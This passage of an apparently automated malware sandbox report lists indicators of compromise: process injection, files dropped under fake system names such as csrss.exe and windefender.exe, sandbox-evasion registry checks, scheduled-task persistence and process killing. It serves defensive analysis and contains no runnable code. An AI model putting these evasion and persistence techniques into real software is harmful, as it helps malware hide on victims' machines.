key.exeCDB6.tmp.execmd.exeXagdaNLKU.exeGDZ4y6rzJ.exeprivacytools5.exeprivacytools5.exeED72.tmp.exedescription pid process target process PID 3136 set thread context of 3996 3136 key.exe key.exe PID 1636 set thread context of 3916 1636 CDB6.tmp.exe CDB6.tmp.exe PID 888 set thread context of 5096 888 cmd.exe 8590c1ec..exe PID 5628 set thread context of 5856 5628 XagdaNLKU.exe XagdaNLKU.exe PID 5896 set thread context of 5128 5896 GDZ4y6rzJ.exe GDZ4y6rzJ.exe PID 7672 set thread context of 7404 7672 privacytools5.exe privacytools5.exe PID 6988 set thread context of 1420 6988 privacytools5.exe privacytools5.exe PID 6884 set thread context of 2108 6884 ED72.tmp.exe AddInProcess32.exe -
Drops file in Program Files directory 64 IoCs
Processes:
7za.exeapp.exevpn.tmpprolab.tmponaqkq5mwmg.tmpIBInstaller_97039.tmp7za.exesetup.exeiohfq4l4pj4.exeapp.exetimeout.exesetup.exeDllHost.exe7za.exesetup.exe7za.exevict.tmp7za.exesetup.exe7za.exeMaskVPNUpdate.exedescription ioc process File opened for modification C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys 7za.exe File opened for modification C:\Program Files (x86)\Delicate-Fire\winamp-plugins.7z app.exe File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-IFPE8.tmp prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-JQ1I5.tmp prolab.tmp File created C:\Program Files (x86)\viewerise\unins000.dat onaqkq5mwmg.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-DHT4N.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\Fragrant-Forest\winamp.exe 7za.exe File created C:\Program Files (x86)\Fragrant-Forest\NalDrv.sys setup.exe File created C:\Program Files (x86)\Delicate-Fire\7za.exe app.exe File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files\9OZ13L0AAW\uninstaller.exe.config iohfq4l4pj4.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-NAL7C.tmp vpn.tmp File created C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe.config iohfq4l4pj4.exe File created C:\Program Files (x86)\Still-Rain\7za.exe app.exe File created C:\Program Files (x86)\Windows Photo Viewer\Tewytileli.exe timeout.exe File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File opened for modification C:\Program Files (x86)\White-Pond\winamp-plugins.7z setup.exe File created C:\Program Files (x86)\Delicate-Fire\7zxa.dll app.exe File created C:\Program Files (x86)\Delicate-Fire\winamp.7z app.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-6LODV.tmp vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-TDPJH.tmp prolab.tmp File created C:\Program Files (x86)\Delicate-Fire\NalDrv.sys DllHost.exe File created C:\Program Files (x86)\MaskVPN\is-31DES.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-U5MFS.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-TUCUH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-7BN6S.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-CDIUN.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.Math.dll prolab.tmp File opened for modification C:\Program Files (x86)\Picture Lab\Pictures Lab.exe prolab.tmp File opened for modification C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-867I8.tmp vpn.tmp File created C:\Program Files (x86)\Fragrant-Forest\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\Delicate-Fire\help.txt app.exe File created C:\Program Files (x86)\White-Pond\winamp.7z setup.exe File created C:\Program Files (x86)\Fragrant-Forest\help.txt setup.exe File created C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files (x86)\Still-Rain\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-F1IVL.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys 7za.exe File opened for modification C:\Program Files (x86)\Delicate-Fire\winamp.exe 7za.exe File created C:\Program Files (x86)\White-Pond\NalDrv.sys setup.exe File created C:\Program Files (x86)\MaskVPN\is-224KG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-2DC8L.tmp IBInstaller_97039.tmp File created C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe timeout.exe File created C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys 7za.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-R8TD1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files (x86)\Picture Lab\is-JGS79.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Delicate-Fire\winamp.exe 7za.exe File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-FDE04.tmp vpn.tmp -
Drops file in Windows directory 24 IoCs
Processes:
svchost.exeDrvInst.execsrss.exeschtasks.exetapinstall.exeDrvInst.exeConhost.exemultitimer.exemultitimer.exereg.exeapp.exeMicrosoftEdge.exeWerFault.exeschtasks.exeMicrosoftEdge.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Tasks\byGaxHSkIutywxzLoY.job schtasks.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new Conhost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT reg.exe File opened for modification C:\Windows\rss app.exe File created C:\Windows\rss\csrss.exe app.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new Conhost.exe File created C:\Windows\Tasks\byGaxHSkIutywxzLoY.job schtasks.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4944 4208 WerFault.exe loboydfybij.exe 4632 4208 WerFault.exe loboydfybij.exe 4396 4208 WerFault.exe loboydfybij.exe 4988 4208 WerFault.exe loboydfybij.exe 4124 4208 WerFault.exe loboydfybij.exe 2588 4208 WerFault.exe loboydfybij.exe 5208 4208 WerFault.exe loboydfybij.exe 5252 5856 WerFault.exe XagdaNLKU.exe 5380 5348 WerFault.exe fdrnjk1bsri.exe 8056 5348 WerFault.exe fdrnjk1bsri.exe 7216 5348 WerFault.exe fdrnjk1bsri.exe 7080 5348 WerFault.exe fdrnjk1bsri.exe 5560 5348 WerFault.exe fdrnjk1bsri.exe 7608 5348 WerFault.exe fdrnjk1bsri.exe 4188 5348 WerFault.exe fdrnjk1bsri.exe 7392 6936 WerFault.exe axl4f0wpmpz.exe 6840 6936 WerFault.exe axl4f0wpmpz.exe 7680 6936 WerFault.exe axl4f0wpmpz.exe 7436 6936 WerFault.exe axl4f0wpmpz.exe 5928 6936 WerFault.exe axl4f0wpmpz.exe 1424 6936 WerFault.exe axl4f0wpmpz.exe 6820 6936 WerFault.exe axl4f0wpmpz.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeDrvInst.exeprivacytools5.exeWerFault.exetapinstall.exeDrvInst.exeprivacytools5.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
CDB6.tmp.exeSetup.exeSetup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CDB6.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CDB6.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7592 schtasks.exe 4956 schtasks.exe 6652 schtasks.exe 2776 schtasks.exe 6812 schtasks.exe 7032 schtasks.exe 5484 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 5872 timeout.exe 6012 timeout.exe 4824 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
Processes:
multitimer.exemultitimer.exesetup.exemultitimer.exesetup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe -
GoLang User-Agent 6 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 727 Go-http-client/1.1 HTTP User-Agent header 731 Go-http-client/1.1 HTTP User-Agent header 733 Go-http-client/1.1 HTTP User-Agent header 735 Go-http-client/1.1 HTTP User-Agent header 737 Go-http-client/1.1 HTTP User-Agent header 739 Go-http-client/1.1 -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4556 taskkill.exe 7988 taskkill.exe 6864 taskkill.exe 7304 taskkill.exe 5744 taskkill.exe 8152 taskkill.exe 584 taskkill.exe 4748 taskkill.exe -
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exepowershell.exepowershell.exemask_svc.exesetup.exeDrvInst.exeapp.exenetsh.exeapp.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" csrss.exe Key created 